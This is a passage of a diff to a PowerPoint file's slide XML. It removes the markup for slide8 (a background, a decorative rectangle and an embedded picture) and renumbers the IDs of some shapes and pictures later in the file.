-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:bg>
-      <p:bgPr>
-        <a:solidFill>
-          <a:schemeClr val="bg1"/>
-        </a:solidFill>
-        <a:effectLst/>
-      </p:bgPr>
-    </p:bg>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="Rectangle 10">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A4FC2C-047E-45A5-965D-8E1E3BF09BC6}"/>
-              </a:ext>
-              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
-                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:extLst>
-              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
-                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
-              </p:ext>
-            </p:extLst>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr bwMode="white">
-          <a:xfrm>
-            <a:off x="1143" y="0"/>
-            <a:ext cx="9141714" cy="5143500"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="2">
-            <a:schemeClr val="accent1">
-              <a:shade val="50000"/>
-            </a:schemeClr>
-          </a:lnRef>
-          <a:fillRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle>
-            <a:defPPr>
-              <a:defRPr lang="en-US"/>
-            </a:defPPr>
-            <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="lt1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl1pPr>
-            <a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="lt1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl2pPr>
-            <a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="lt1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl3pPr>
-            <a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="lt1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl4pPr>
-            <a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="lt1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl5pPr>
-            <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="lt1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl6pPr>
-            <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="lt1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl7pPr>
-            <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="lt1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl8pPr>
-            <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:defRPr sz="1800" kern="1200">
-                <a:solidFill>
-                  <a:schemeClr val="lt1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:defRPr>
-            </a:lvl9pPr>
-          </a:lstStyle>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="6" name="Picture 5">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D453D075-E18C-4230-6CAF-DE47F9734679}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId2"/>
-          <a:srcRect b="900"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="20" y="961"/>
-            <a:ext cx="9143980" cy="5142539"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -10645,7 +11516,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="20" name="Rectangle 19">
+          <p:cNvPr id="11" name="Rectangle 10">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A4FC2C-047E-45A5-965D-8E1E3BF09BC6}"/>
@@ -10800,10 +11671,10 @@
       </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="7" name="Picture 6">
+          <p:cNvPr id="6" name="Picture 5">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0386FB2D-9D67-0B72-B621-522F43E61313}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D453D075-E18C-4230-6CAF-DE47F9734679}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
